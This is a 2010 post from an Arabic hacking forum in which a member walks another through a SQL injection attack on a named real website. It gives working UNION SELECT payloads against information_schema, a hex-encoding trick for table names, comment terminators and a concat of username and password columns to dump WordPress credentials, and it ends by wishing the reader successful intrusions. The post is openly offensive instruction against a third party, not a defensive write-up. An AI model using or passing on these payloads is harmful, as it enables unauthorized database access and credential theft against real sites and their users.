التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب
تحديث الصفحة مساعده من محترفى SQL
التعليمات التقويم البحث مشاركات اليوم

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
السابق المشاركة السابقة   المشاركة التالية التالي
قديم 02-13-2010, 12:16 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 
 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road
Smile

السلام عليكم


اخي اولا ./

كود:
http://qcsgopc.org/quote.php?ID=13+union+select+1,2,3,concat%28table_name,0x3a,column_name,0x3a,table_schema%29,5+from+information_schema.columns+where+column_name%20+like+char%2837,%20112,%2097,%20115,%20115,%2037%29
الى هنا الحقنــة صحيحــة..


ثانيــا يا اخي ..

كود:
http://qcsgopc.org/quote.php?ID=-13+union+select+1,2,3,wp_posts,5+from+james138
هذا غلــــط ككككككككككككككككككككككككككككككككككككككبير

شوف اخي عندما استخرجت اعمدة الباسورد وهي ..


wp_posts:post_password:james138


wp_users:user_pass:james138


طبعـــا انت استخرجتها بالحنقه الاولى وهي هذه .

اقتباس
http://qcsgopc.org/quote.php?ID=13+u...20115,%2037%29

طيب لما ظهرت لك الاعمدة او الجداول هذي .



wp_posts:post_password:james138


wp_users:user_pass:james138


اذهــب فــوررأأأ الى هذا المـــوقــع .. وهو موقع التشفير ..


http://waraxe.us/sql-char-encoder.html


طيب الحين ياغالي تاخذ [ اســم الجدول ] ..

وهذا هو wp_posts او wp_users


اختر واحد فيهم واذهب الى الى موقع التشفير وضعــه في الموقع حتى يتم تشفيره


لكي يستخرج لك عمود اليوزر نيــم ..


وهذه صــورة ياغالي ..







الان عرفنا كيف نشفر .. ^^


طيب انسخ الكلام الي ماشر عليه بالصوره بعد التشفير وضعه بعد الامر هذا ..

where+table_name=#


مثال .:


+where+table_name=0x77705f706f737473


الان انسخ الامر كامل ..مع الكلام الي شفرناهـ ..


واذهب الى الحقنـه هذه ..


اقتباس
http://qcsgopc.org/quote.php?ID=13+u...20115,%2037%29

وامــســح هذا الامر تبع الباسورد


where+column_name +like+char(37, 112, 97, 115, 115, 37)

وضــع هذا الامر ..


+where+table_name=0x77705f706f737473


ولا تنسى ان تضع هذا [ -- ] او iهذا [ /* ] اذا كان الموقع لايقبل ..


وبعد ماتفعل سوف يظهر لك اسم اليوزر ..

وهو post_name

لما يظهر اذهب وضع اسم اليوز في العمود المصاب وسوف يظهر لك اسم صاحب الموقع


او اذا اردت ان يظهر لك الباسورد واليوز مع بعض


اكتب هذا الامر في العمود المصاب ..

Concat(user,0x3a,pass)


ضـع مكان user اسسم اليوزر نيم تبع االموقع الي انت طلعتــه

وضع مكان pass اسم عمود الباسورد الي انت طلعتــه وهو post_password او user_pass



وفي نهايت الرابط ضــع هذا الاسسم


james138
وهو ياتي دايمــا اخر كلمــه


wp_posts:post_password:james138


ثم اضغط انتر وسوف يظهر لك اليوز والباسورد ..


ومن ثم الاختراق ..



أرجــو إنــك فـهــمت شرحــي وانا انصــحك تتابع هذا الفهرس تبع الاخ [ فلكانو جزاه الله خيرأأ ]

وهو فهرس لإختراق المواقع بثغرات SQL وبإذن الله سوف تصبح محترف ياغالي

وهذا رابط الفهرس هنا بالمنتدى ..

http://www.vbspiders.com/vb/t22432.html


تحياتي لك اخــي الغالي

:00001793[1]:وأختراقات موفقــه بإذن الله .. :00001793[1]:
التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس
 

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »
أدوات الموضوع
انواع عرض الموضوع
العرض الشجري العرض الشجري

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
طلب الى محترفي نادي vbspiders wayne جـــ'ابات العناكــ'ب 9 02-28-2018 07:58 AM
طلب من محترفى الحقن sasa22 جـــ'ابات العناكــ'ب 0 10-30-2010 06:26 PM


الساعة الآن 03:25 AM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0